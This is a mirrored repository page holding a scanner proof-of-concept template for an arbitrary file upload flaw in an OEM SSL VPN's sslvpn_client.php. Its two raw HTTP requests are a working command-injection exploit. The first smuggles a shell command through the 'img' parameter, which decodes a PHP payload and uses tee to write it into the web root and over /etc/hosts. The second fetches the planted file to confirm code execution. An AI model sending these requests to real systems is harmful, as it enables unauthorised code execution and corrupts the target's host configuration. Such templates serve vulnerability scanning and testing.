admin/dddd
1
0
Fork 0
mirror of https://github.com/SleepingBag945/dddd.git synced 2025-06-10 18:22:26 +00:00
Code Issues Packages Projects Releases Wiki Activity
dddd/common/config/pocs/webui-js-oem-sslvpn-client-fileupload.yaml
SleepingBag945 9a83a1b39f dddd v2.0
2024-04-03 06:32:26 +02:00

25 lines
785 B
YAML
Raw Blame History

id: webui-js-oem-sslvpn-client-fileupload
info:
name: WebUI-JS 某OEM厂商 sslvpn_client.php 任意文件上传
author: SleepingBag945
severity: critical
variables:
filename: "{{to_lower(rand_base(10))}}"
content: "{{base64('<?php echo 111*111; unlink(__FILE__); ?>')}}"
http:
- raw:
- |+
GET /sslvpn/sslvpn_client.php?client=logoImg&img=6d%20/tmp%20||%20echo%20{{content}}%20|%20base64%20-d%20|%20tee%20/etc/hosts%20/usr/local/webui/webui/images/basic/login/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
- |+
GET /webui/images/basic/login/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code_2==200 && contains_all(body_2,"12321")
Reference in New Issue View Git Blame Copy Permalink